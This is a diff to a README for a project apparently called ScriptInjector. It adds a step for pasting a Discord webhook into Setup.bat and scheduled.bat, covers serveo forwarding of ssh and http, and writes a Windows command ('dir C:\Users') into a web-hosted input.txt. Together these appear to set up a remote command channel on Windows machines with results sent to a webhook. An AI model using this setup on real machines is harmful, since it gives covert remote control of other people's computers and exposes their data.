emaa10/ScriptInjector/README.md

 6. Adapt Setup.bat and scheduled.bat to match your chosen hostname / your public IP

+7. Create a discord webhook in a channel on a server and paste the URL into Setup.bat and scheduled.bat.

-7. Start serveo (or a different port forwarding service)
+8. Start serveo (or a different port forwarding service)
     - See the launch_serveo.txt file for 2 commands to forward ssh and http to your_hostname.serveo.net
     - You can use screen to start multiple serveo forwarding simultaneously

-8. Create folders and the input.txt
+9. Create folders and the input.txt
     ```
     touch /var/www/html/input.txt
     echo "dir C:\Users" >> /var/www/html/input.txt